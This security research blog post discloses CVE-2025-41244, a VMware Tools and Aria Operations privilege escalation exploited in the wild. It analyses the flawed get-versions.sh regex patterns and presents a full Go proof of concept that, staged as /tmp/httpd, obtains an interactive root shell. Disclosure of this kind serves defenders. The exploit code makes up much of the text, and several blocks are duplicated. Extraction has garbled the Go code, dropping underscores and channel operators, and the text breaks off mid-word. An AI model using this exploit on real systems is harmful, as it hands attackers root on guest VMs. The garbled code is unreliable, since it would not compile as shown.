You name it, VMware elevates it (CVE-2025-41244)
blog.nviso.eu Maxime Thiebaut Incident Response & Threat Researcher Expert within NVISO CSIRT 29.09.2025 NVISO has identified zero-day exploitation of CVE-2025-41244, a local privilege escalation vulnerability impacting VMware's guest service discovery features. On September 29th, 2025, Broadcom disclosed a local privilege escalation vulnerability, CVE-2025-41244, impacting VMware’s guest service discovery features. NVISO has identified zero-day exploitation in the wild beginning mid-October 2024. The vulnerability impacts both the VMware Tools and VMware Aria Operations. When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root). Throughout its incident response engagements, NVISO determined with confidence that UNC5174 triggered the local privilege escalation. We can however not assess whether this exploit was part of UNC5174’s capabilities or whether the zero-day’s usage was merely accidental due to its trivialness. UNC5174, a Chinese state-sponsored threat actor, has repeatedly been linked to initial access operations achieved through public exploitation. Background Organizations relying on the VMware hypervisor commonly employ the VMware Aria Suite to manage their hybrid‑cloud workloads from a single console. Within this VMware Aria Suite, VMware Aria Operations is the component that provides performance insights, automated remediation, and capacity planning for the different hybrid‑cloud workloads. As part of its performance insights, VMware Aria Operations is capable of discovering which services and applications are running in the different virtual machines (VMs), a feature offered through the Service Discovery Management Pack (SDMP). The discovery of these services and applications can be achieved in either of two modes: The legacy credential-based service discovery relies on VMware Aria Operations running metrics collector scripts within the guest VM using a privileged user. In this mode, all the collection logic is managed by VMware Aria Operations and the guest’s VMware Tools merely acts as a proxy for the performed operations. The credential-less service discovery is a more recent approach where the metrics collection has been implemented within the guest’s VMware Tools itself. In this mode, no credentials are needed as the collection is performed under the already privileged VMware Tools context. As part of its discovery, NVISO was able to confirm the privilege escalation affects both modes, with the logic flaw hence being respectively located within VMware Aria Operations (in credential-based mode) and the VMware Tools (in credential-less mode). While VMware Aria Operations is proprietary, the VMware Tools are available as an open-source variant known as VMware’s open-vm-tools, distributed on most major Linux distributions. The following CVE-2025-41244 analysis is performed on this open-source component. Analysis Within open-vm-tools’ service discovery feature, the component handling the identification of a service’s version is achieved through the get-versions.sh shell script. As part of its logic, the get-versions.sh shell script has a generic getversion function. The function takes as argument a regular expression pattern, used to match supported service binaries (e.g., /usr/bin/apache), and a version command (e.g., -v), used to indicate how a matching binary should be invoked to retrieve its version. When invoked, get_version loops $space_separated_pids, a list of all processes with a listening socket. For each process, it checks whether service binary (e.g., /usr/bin/apache) matches the regular expression and, if so, invokes the supported service’s version command (e.g., /usr/bin/apache -v). get_version() { PATTERN=$1 VERSION_OPTION=$2 for p in $space_separated_pids do COMMAND=$(get_command_line $p | grep -Eo "$PATTERN") [ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]}" $VERSION_OPTION 2>&1)" VERSIONEND done } get_version() { PATTERN=$1 VERSION_OPTION=$2 for p in $space_separated_pids do COMMAND=$(get_command_line $p | grep -Eo "$PATTERN") [ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]}" $VERSION_OPTION 2>&1)" VERSIONEND done } The get_version function is called using several supported patterns and associated version commands. While this functionality works as expected for system binaries (e.g., /usr/bin/httpd), the usage of the broad‑matching \S character class (matching non‑whitespace characters) in several of the regex patterns also matches non-system binaries (e.g., /tmp/httpd). These non-system binaries are located within directories (e.g., /tmp) which are writable to unprivileged users by design. get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v get_version "/usr/(bin|sbin)/apache\S" -v get_version "/\S+/mysqld($|\s)" -V get_version ".?/\S*nginx($|\s)" -v get_version "/\S+/srm/bin/vmware-dr($|\s)" --version get_version "/\S+/dataserver($|\s)" -v get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v get_version "/usr/(bin|sbin)/apache\S" -v get_version "/\S+/mysqld($|\s)" -V get_version ".?/\S*nginx($|\s)" -v get_version "/\S+/srm/bin/vmware-dr($|\s)" --version get_version "/\S+/dataserver($|\s)" -v By matching and subsequently executing non-system binaries (CWE-426: Untrusted Search Path), the service discovery feature can be abused by unprivileged users through the staging of malicious binaries (e.g., /tmp/httpd) which are subsequently elevated for version discovery. As simple as it sounds, you name it, VMware elevates it. Proof of Concept To abuse this vulnerability, an unprivileged local attacker can stage a malicious binary within any of the broadly-matched regular expression paths. A simple common location, abused in the wild by UNC5174, is /tmp/httpd. To ensure the malicious binary is picked up by the VMware service discovery, the binary must be run by the unprivileged user (i.e., show up in the process tree) and open at least a (random) listening socket. The following bare-bone CVE-2025-41244.go proof-of-concept can be used to demonstrate the privilege escalation. package main import ( "fmt" "io" "net" "os" "os/exec" ) func main() { // If started with an argument (e.g., -v or --version), assume we're the privileged process. // Otherwise, assume we're the unprivileged process. if len(os.Args) >= 2 { if err := connect(); err != nil { panic(err) } } else { if err := serve(); err != nil { panic(err) } } } func serve() error { // Open a dummy listener, ensuring the service can be discovered. dummy, err := net.Listen("tcp", "127.0.0.1:0") if err != nil { return err } defer dummy.Close() // Open a listener to exchange stdin, stdout and stderr streams. l, err := net.Listen("unix", "@cve") if err != nil { return err } defer l.Close() // Loop privilege escalations, but don't do concurrency. for { if err := handle(l); err != nil { return err } } } func handle(l net.Listener) error { // Wait for the privileged stdin, stdout and stderr streams. fmt.Println("Waiting on privileged process...") stdin, err := l.Accept() if err != nil { return err } defer stdin.Close() stdout, err := l.Accept() if err != nil { return err } defer stdout.Close() stderr, err := l.Accept() if err != nil { return err } defer stderr.Close() // Interconnect stdin, stdout and stderr. fmt.Println("Connected to privileged process!") errs := make(chan error, 3) go func() { , err := io.Copy(os.Stdout, stdout) errs err }() go func() { , err := io.Copy(os.Stderr, stderr) errs err }() go func() { , err := io.Copy(stdin, os.Stdin) errs err }() // Abort as soon as any of the interconnected streams fails. = errs return nil } func connect() error { // Define the privileged shell to execute. cmd := exec.Command("/bin/sh", "-i") // Connect to the unprivileged process stdin, err := net.Dial("unix", "@cve") if err != nil { return err } defer stdin.Close() stdout, err := net.Dial("unix", "@cve") if err != nil { return err } defer stdout.Close() stderr, err := net.Dial("unix", "@cve") if err != nil { return err } defer stderr.Close() // Interconnect stdin, stdout and stderr. fmt.Fprintln(stdout, "Starting privileged shell...") cmd.Stdin = stdin cmd.Stdout = stdout cmd.Stderr = stderr return cmd.Run() } package main import ( "fmt" "io" "net" "os" "os/exec" ) func main() { // If started with an argument (e.g., -v or --version), assume we're the privileged process. // Otherwise, assume we're the unprivileged process. if len(os.Args) >= 2 { if err := connect(); err != nil { panic(err) } } else { if err := serve(); err != nil { panic(err) } } } func serve() error { // Open a dummy listener, ensuring the service can be discovered. dummy, err := net.Listen("tcp", "127.0.0.1:0") if err != nil { return err } defer dummy.Close() // Open a listener to exchange stdin, stdout and stderr streams. l, err := net.Listen("unix", "@cve") if err != nil { return err } defer l.Close() // Loop privilege escalations, but don't do concurrency. for { if err := handle(l); err != nil { return err } } } func handle(l net.Listener) error { // Wait for the privileged stdin, stdout and stderr streams. fmt.Println("Waiting on privileged process...") stdin, err := l.Accept() if err != nil { return err } defer stdin.Close() stdout, err := l.Accept() if err != nil { return err } defer stdout.Close() stderr, err := l.Accept() if err != nil { return err } defer stderr.Close() // Interconnect stdin, stdout and stderr. fmt.Println("Connected to privileged process!") errs := make(chan error, 3) go func() { , err := io.Copy(os.Stdout, stdout) errs err }() go func() { , err := io.Copy(os.Stderr, stderr) errs err }() go func() { , err := io.Copy(stdin, os.Stdin) errs err }() // Abort as soon as any of the interconnected streams fails. _ = errs return nil } func connect() error { // Define the privileged shell to execute. cmd := exec.Command("/bin/sh", "-i") // Connect to the unprivileged pro...
